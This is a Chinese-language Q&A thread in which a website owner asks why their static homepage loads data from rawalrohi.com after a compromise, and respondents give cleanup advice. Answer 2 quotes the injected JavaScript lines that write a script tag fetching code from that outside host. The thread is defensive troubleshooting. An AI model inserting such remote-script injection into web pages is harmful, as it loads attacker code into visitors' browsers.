我们的 html 网站中存在神秘的 URL

Question

我们的静态 html 网站 http://www.iffort.com 的主页正在从一个神秘的网站传输数据网站 rawalrohi.com。您可以访问 iffort.com 并注意那里的页脚来检查这一点。它说从 rawalrohi.com 传输数据。

从我们这边，我们做了以下事情来纠正这个问题

： a.) 分析所有页面的源代码。我们检查了代码，发现有一个脚本 src=http://rawalrohi.com/images/ART。 php 被插入到所有页面中。我们从网站的所有“html”页面中删除了这个脚本

b.)接下来我们与托管公司交谈，他们说他们可以为我们提供网站的备份。我们有备份，但尚未使用它来恢复站点。

c.)最后，我们更改了 FTP 密码，因为我们被告知有人可能破解了我们的 FTP 密码。

尽管如此，主页仍然显示从 rawalrohi.com 传输数据。查看源代码不会显示 URL。这会减慢我们网站的速度。

非常感谢任何帮助。

Answer 1

我没有扫描您的网站，但如果您在网站上使用任何标准软件，例如：WordPress、Drupal、Joomla 等，那么您需要始终保持更新。订阅他们的安全警报，每当您看到更新时，放下您正在做的一切并进行更新。

黑客不断扫描互联网以查找易受攻击的网站。他们只需要几分之一秒的时间就能感染易受攻击的网站。

此外，还要保持所有插件、附加组件、组件、模块、贡献等的更新。

否则，您将一遍又一遍地清洁它。

Answer 2

您的页面引用了一个名为“js/hyperlinked_Images.js”的文件
看看这个文件，就在底部附近：

...
document.write('<script src=http://rawalrohi.com/images/ART.php ><\/script>');
document.write('<script src=http://rawalrohi.com/images/ART.php ><\/script>');
document.write('<script src=http://rawalrohi.com/images/ART.php ><\/script>');

现在请原谅，我要在我的系统上运行快速 AV 扫描；）

Answer 3

确保您不要使用一个 FTP 帐户来做所有事情，控制 FTP 用户控制，它将帮助您管理您的网站。

Answer 4

我不久前也见过类似的行为。在该特定情况下，ftp 密码已被泄露：收集存储的 ftp 密码的恶意软件从客户端桌面 PC 读取该密码。

几天之内密码被更改并再次被泄露后，我们才发现这一点。

因此，请确保使用合适的 AV 扫描仪扫描所有“知道”ftp 密码的计算机。

Answer 5

我最近刚刚在客户网站上看到了这一点，他们的所有文件中都有不同的网址但相同类型的代码注入。为了解决这个问题，我下载了该站点，并使用 Visual Studio 对字符串进行了站点范围的“查找和替换”。这为我解决了问题。我建议您对所有文件执行类似的操作，您可能会错过一个。我的客户网站有 html/htm/aspx 文件，这些文件都被感染了，ISP 也做出了同样的声明，FTP 密码可能已被泄露......

Answer 6

确保您安装了防病毒软件。每当您的网站加载有趣的外部脚本（如广告软件、间谍软件）时，您的防病毒软件就会提醒您。